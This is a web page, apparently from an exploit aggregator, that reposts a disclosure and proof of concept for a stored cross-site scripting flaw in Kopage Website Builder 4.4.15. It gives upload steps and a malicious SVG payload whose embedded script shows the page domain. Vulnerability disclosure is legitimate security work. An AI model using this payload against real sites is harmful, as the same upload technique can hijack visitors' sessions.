Home Tools Exploits & CVE's Kopage Website Builder 4.4.15 Cross Site Scripting

Kopage Website Builder 4.4.15 Cross Site Scripting

December 4, 2023

130

Authored by tmrswrr

Kopage Website Builder version 4.4.15 suffers from a persistent cross site scripting vulnerability.

#Exploit Title: Kopage Website Builder version 4.4.15 – Stored Cross-Site Scripting (XSS)
#Date: 1/12/2023
#Exploit Author: tmrswrr
#Vendor Homepage: https://www.kopage.com/
#Version: Version : 4.4.15
#Tested on: https://demo.kopage.com/index.php


#Poc:

1 ) Install the system through the website and log in with any user.
2 ) Go to Files field and click upload 
3 ) Upload your svg file

Payload :

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">
    <script>//<![CDATA[
        alert(document.domain)
    //]]>
    </script>
</svg>

4 ) Open svg file url you will be see alert button.

Url : https://demo.kopage.com/demo/9ff16a191981a3f2ee0a7cca7/data/files/aaa.svg

Kopage Website Builder 4.4.15 Cross Site Scripting

Follow us on Instagram @thecyberpost

EDITOR PICKS

After Ascension ransomware attack, feds issue alert on Black Basta group

Hack of provincial Canadian government suspected to be ‘state-sponsored’

Vermont passes data privacy law allowing consumers to sue companies

POPULAR POSTS

ESET NOD32 Antivirus 17.1.11.0 Unquoted Service Path

Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Sniffle – A Sniffer For Bluetooth 5 And 4.X LE

POPULAR CATEGORY

Roxy WI 6.1.0.0 Remote Command Execution

Cisco RV340 SSL VPN Unauthenticated Remote Code Execution

Simple Blog 3.2 Cross Site Scripting